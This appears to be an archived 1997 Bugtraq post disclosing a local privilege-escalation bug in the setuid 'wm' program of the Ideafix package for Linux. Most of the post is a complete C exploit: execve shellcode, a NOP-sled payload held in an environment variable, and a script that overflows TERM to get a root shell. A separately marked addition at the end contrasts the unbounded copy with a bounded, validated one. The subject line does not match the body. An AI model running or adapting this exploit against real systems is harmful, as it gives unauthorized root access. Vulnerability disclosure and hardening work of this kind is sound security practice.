Bugtraq mailing list archives
Re: WinNT syscalls insecurity
From: bst () INAME COM (Bst Perez Companc)
Date: Sun, 19 Oct 1997 05:04:18 -0400
A vulnerability exists in the package Ideafix distributed with several versions of Linux [ ftp://sunsite.unc.edu/pub/Linux/devel/ideafix ] [ ftp://ftp.inter-soft.com/pub/ideafix ]. This is a very popular development environment here in Argentina. Due to the lack of proper bounds checking in the setuid root program wm, the environment variable TERM is copied into a local fixed-size buffer; you guessed it, a shell with euid=0.

Comments: bisti <bst () iname com>

Greetz to fidel, larry, rb, rnt, veida.

[--------------------------- wm_exp.c ---------------------------]
/*
 * 'Ideafix wm' Exploit 4 Linux.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* for strlen() and memcpy(); missing from the posted code */

#define TERMSIZE 2000
#define HUEVOSIZE 5000

char *shell =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (i386, gcc asm syntax of the time). */
long esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(void)
{
    char *ptr, *bof, *egg;
    long *addr_ptr, addr;
    int i;

    if ( !(bof = malloc(TERMSIZE)) ) {
        printf("NoMoreMemory4bof.\n");
        exit(1);
    }
    if ( !(egg = malloc(HUEVOSIZE)) ) {
        printf("NoMoreMemory4egg.\n");
        exit(1);
    }

    /* BOF: the oversized TERM value, filled with the stack address. */
    addr = esp();
    addr_ptr = (long *) bof;
    for (i = 0; i < TERMSIZE; i += 4)
        *(addr_ptr++) = addr;

    /* EGG: a second environment variable holding the payload. */
    ptr = egg;
    for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
        *(ptr++) = 0x90;
    for( i = 0; i < strlen(shell); i++)
        *(ptr++) = shell[i];

    bof[TERMSIZE - 1] = '\0';
    egg[HUEVOSIZE - 1] = '\0';
    memcpy(bof, "BOF=", 4);
    memcpy(egg , "EGG=", 4);
    putenv(bof);
    putenv(egg);

    /* Write and run a small script that exports TERM and starts wm. */
    system("echo '#!/bin/sh' >> doit");
    system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
    system("echo 'and run the vulnerable program.' >> doit");
    system("echo '# Bisti [111097]' >> doit");
    system("echo 'killall wm' >> doit");
    system("echo 'TERM=$BOF;export TERM' >> doit");
    system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");
    system("sh ./doit");
}
[---------------------------------------------------------------------------]
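The defect the post describes is an unbounded copy of TERM into a fixed-size local buffer in a setuid program. As an added example, not code from the post or from Ideafix, here is that pattern beside a bounded, validated copy; the buffer size TERMBUF and the function names are assumptions.

```c
/* Added example: the unbounded copy of TERM the post describes, beside a
 * bounded, validated copy. Not Ideafix/wm code; TERMBUF and the function
 * names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define TERMBUF 64   /* assumed size of the program's fixed-size local buffer */

/* Vulnerable pattern: the environment value is copied with no length check,
 * so a TERM longer than dst runs off the end of the stack buffer. Shown for
 * contrast only; it is never called with untrusted input in this example. */
void term_copy_unbounded(char *dst, const char *term)
{
    strcpy(dst, term);
}

/* Hardened version: treats TERM as untrusted input. Returns 1 and fills dst
 * on success; returns 0 (dst set to "") if TERM is missing, empty, longer
 * than dst allows, or contains characters no terminal name uses. */
int term_copy_checked(char *dst, size_t dstlen, const char *term)
{
    const char *end;
    size_t n, i;

    if (dstlen == 0)
        return 0;
    dst[0] = '\0';
    if (term == NULL)
        return 0;
    end = memchr(term, '\0', dstlen);   /* look for the NUL within dstlen bytes only */
    if (end == NULL)
        return 0;                       /* no terminator in range: value does not fit */
    n = (size_t)(end - term);           /* n <= dstlen - 1, so n + 1 bytes fit */
    if (n == 0)
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)term[i];
        if (!(isalnum(c) || c == '-' || c == '+' || c == '.' || c == '_'))
            return 0;                   /* rejects control bytes, spaces, '/', NOP sleds */
    }
    memcpy(dst, term, n + 1);           /* bounded copy, NUL included */
    return 1;
}

/* Privileged-path helper: use the checked copy and fall back to a safe default. */
const char *term_from_env(char *dst, size_t dstlen)
{
    return term_copy_checked(dst, dstlen, getenv("TERM")) ? dst : "dumb";
}
```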